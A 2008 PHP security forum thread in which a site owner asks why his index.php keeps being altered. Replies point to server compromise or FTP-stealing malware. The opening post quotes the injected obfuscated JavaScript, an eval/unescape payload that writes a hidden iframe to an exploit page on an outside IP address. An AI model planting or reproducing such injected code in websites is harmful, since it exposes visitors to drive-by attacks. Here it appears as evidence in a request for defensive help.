need help - someone is hacking my website

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.

Moderator: General Moderators

Post Reply
shah2008
Forum Newbie
Posts: 1
Joined: Sat Mar 15, 2008 10:29 am

need help - someone is hacking my website

Post by shah2008 »

Hi,

I have a problem with my PHP / Mysql website. The index.php file is being changed, someone is adding additonal code to the page but I dont know how this is being done. Example code added:

Code: Select all

<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%33%30%39%61%31%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%31%39%35%2e%39%33%2e%32%31%38%2e%32%31%36%2f%7e%73%75%6e%73%79%73%74%65%6d%73%2f%6a%61%76%61%2f%75%70%64%61%74%65%73%2f%75%70%64%61%74%65%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%34%35%37%36%31%29%2b%27%31%33%33%39%62%61%35%35%5c%27%20%77%69%64%74%68%3d%36%38%33%20%68%65%69%67%68%74%3d%36%37%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>
Can anyone please help to understand how this is happening and how to fix.

I look forward to your replies.
Last edited by John Cartwright on Tue Mar 18, 2008 8:24 pm, edited 2 times in total.
Reason: added [code][/code] tags
User avatar
califdon
Jack of Zircons
Posts: 4484
Joined: Thu Nov 09, 2006 8:30 pm
Location: California, USA

Re: need help - someone is hacking my website

Post by califdon »

Do you host your site on your own server or do you use a hosting service? You should check your server logs (or get your hosting service tech support to assist you). That certainly looks like something has infected your server.
User avatar
Mordred
DevNet Resident
Posts: 1579
Joined: Sun Sep 03, 2006 5:19 am
Location: Sofia, Bulgaria

Re: need help - someone is hacking my website

Post by Mordred »

It tries to load an iframe, presumably with some exploit code, but the site which hosts it is currently offline.
My guess is that you have a locally installed virus/malware which intercepts your FTP sessions and inserts these from *your* account.
Post Reply